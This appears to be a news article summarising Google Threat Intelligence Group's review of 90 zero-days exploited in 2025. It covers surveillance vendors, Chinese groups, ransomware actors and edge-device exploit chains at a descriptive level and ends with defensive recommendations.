Google Tracks 90 Zero-Days Exploited in 2025 — Commercial Surveillance Vendors Now Outpace State Hackers

For the first time ever, commercial surveillance vendors were responsible for more zero-day exploitation than traditional state-sponsored cyber espionage groups. Google’s Threat Intelligence Group says the zero-day marketplace has fundamentally shifted — and 2026 will be worse.

The Numbers

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in the wild in 2025, down from 2023’s record of 100 but up from 2024’s 78. The four-year trend is clear: zero-day exploitation has stabilized in the 60–100 range annually, a permanent escalation from pre-2021 levels.

The headline finding: commercial surveillance vendors (CSVs) were attributed to more zero-day exploitation than any nation-state group — a first in GTIG’s tracking history. This isn’t a blip. It’s the culmination of a years-long trend where spyware companies like Intellexa have made military-grade exploitation capabilities available to anyone willing to pay.

Enterprise Is the New Battleground

The enterprise numbers are staggering:

48% of all zero-days (43 vulnerabilities) targeted enterprise technologies — an all-time high
Security and networking devices accounted for half of enterprise zero-days (21), with edge appliances like firewalls, VPNs, and routers serving as prime entry points
Most edge devices lack EDR coverage entirely, creating persistent blind spots that threat actors ruthlessly exploit

“Edge devices sit at the perimeter of an organization’s infrastructure and remain high-value targets,” GTIG noted. “The absence of EDR technology on most edge devices can create a blind spot for defenders, making it an ideal attack surface.”

The vendors getting hit hardest: Cisco, Fortinet, Ivanti, and VMware — names that appear on virtually every enterprise network on the planet.

China Doubles Its Zero-Day Usage

PRC-nexus espionage groups remain the most prolific state-sponsored exploiters of zero-days, and they’re accelerating:

10 zero-days attributed to Chinese groups in 2025 — double the 2024 count
Groups like UNC5221 and UNC3886 continued hammering edge and networking devices for persistent, difficult-to-detect access
Evidence suggests Chinese operators are sharing exploits among separate groups at increasing speed, with the gap between public disclosure and widespread exploitation shrinking rapidly

The pattern is clear: China’s cyber-espionage apparatus is industrializing zero-day exploitation. What used to be closely held capabilities reserved for elite teams are now being distributed across multiple activity clusters.

Notably, North Korea was attributed zero zero-days in 2025, a sharp reversal from the five attributed in 2024.

The BRICKSTORM Problem: Stealing Code to Build More Zero-Days

One of the most alarming findings involves BRICKSTORM malware, linked to PRC-nexus operators. Rather than traditional data exfiltration, these attackers targeted intellectual property — including source code and proprietary development documents — from technology companies.

The implication is chilling: stolen source code can be analyzed to discover new vulnerabilities in the vendor’s software, creating a self-reinforcing cycle where today’s breach enables tomorrow’s zero-day. GTIG describes it as “a new paradigm for zero-day exploitation where data theft has the potential to enable long-term zero-day development.”

This isn’t just a threat to the companies breached. It’s a downstream threat to every customer running their software.

Mobile Exploitation Rebounds, Browsers Hold

Mobile zero-days surged to 15 in 2025, up from 9 in 2024, driven partly by increasingly complex exploit chains — some requiring three or more chained vulnerabilities to achieve desired access.

Browser exploitation, by contrast, fell to historical lows (under 10% of all zero-days), suggesting that browser hardening measures implemented over recent years are genuinely working. However, GTIG cautions that improved attacker operational security may also be hiding some activity.

Samsung’s Image Parsing Nightmare

A particularly noteworthy case involved Samsung devices: attackers exploited a vulnerability in Samsung’s Quram image parsing library (CVE-2025-21042) through malicious DNG image files sent via WhatsApp. The library runs unsandboxed within the com.samsung.ipservice process, meaning a single memory corruption bug granted attackers access to a phone’s entire photo and video library — a devastating capability for surveillance.

The bug was described as “both powerful and quite shallow,” with no control flow integrity mitigations compiled into the library.

Ransomware Groups Join the Zero-Day Club

Financially motivated groups exploited 9 zero-days in 2025, nearly tying the all-time high. Key incidents:

FIN11/CL0P exploited zero-days in Oracle E-Business Suite (CVE-2025-61882 and CVE-2025-61884) as early as August 2025 in a massive extortion campaign
UNC2165 (Evil Corp) used a zero-day (CVE-2025-8088) for initial access — the first time this group was observed doing so
The same vulnerability was likely also exploited by CIGAR/RomCom, a Russian group conducting both financial and espionage operations

The message: zero-day exploitation is no longer reserved for nation-states. Ransomware affiliates are investing in — and deploying — these capabilities at scale.

SonicWall Full-Chain Exploit

GTIG also documented a sophisticated multi-stage exploit chain targeting SonicWall SMA 1000 series appliances, combining:

An authentication bypass (CVE-2025-23006) to steal admin sessions
A deserialization RCE to execute arbitrary commands
A zero-day local privilege escalation (CVE-2025-40602) to reach root

The deserialization vulnerability had been silently patched in March 2024 without a CVE, meaning organizations that hadn’t updated were exposed for over a year without knowing it.

2026 Forecast: AI Accelerates Everything

GTIG’s outlook for 2026 is blunt:

“We anticipate that AI will accelerate the ongoing race between attackers and defenders in 2026, creating a more dynamic threat environment. We expect adversaries will utilize AI to automate and scale attacks by accelerating reconnaissance, vulnerability discovery, and exploit development.”

The compression of timelines — from vulnerability discovery to weaponized exploit — is the critical risk. Organizations that already struggle to patch within weeks will face adversaries who can develop exploits within days.

What Organizations Should Do Now

GTIG’s defensive recommendations emphasize preparation for inevitable compromise:

Architecture:

Segment DMZ, firewalls, and VPNs from core network and domain controllers
Monitor execution flow within applications to block unauthorized commands
Don’t expose network ports to the internet unless strictly required

Detection:

Enforce driver blocklists and flag anomalous kernel-level behavior
Baseline system processes to detect Living off the Land activity
Deploy canary tokens for high-fidelity lateral movement alerts

Response:

Maintain a Software Bill of Materials (SBoM) to quickly locate affected libraries
Establish emergency patching processes that bypass standard change management
If no patch is available, isolate affected systems immediately

The Bottom Line

The zero-day landscape has undergone a structural transformation. Commercial surveillance vendors have democratized access to capabilities once reserved for the world’s most sophisticated intelligence agencies. Enterprise infrastructure — particularly the edge devices organizations trust to protect their networks — has become the primary attack surface. And the feedback loop of stealing source code to develop future exploits means this problem is self-reinforcing.

Ninety zero-days in a single year is no longer an anomaly. It’s the new normal.

The full Google Threat Intelligence Group 2025 Zero-Day Review is available on Google Cloud’s blog, including detailed technical analyses of browser sandbox escapes, the SonicWall exploit chain, and Samsung DNG exploitation.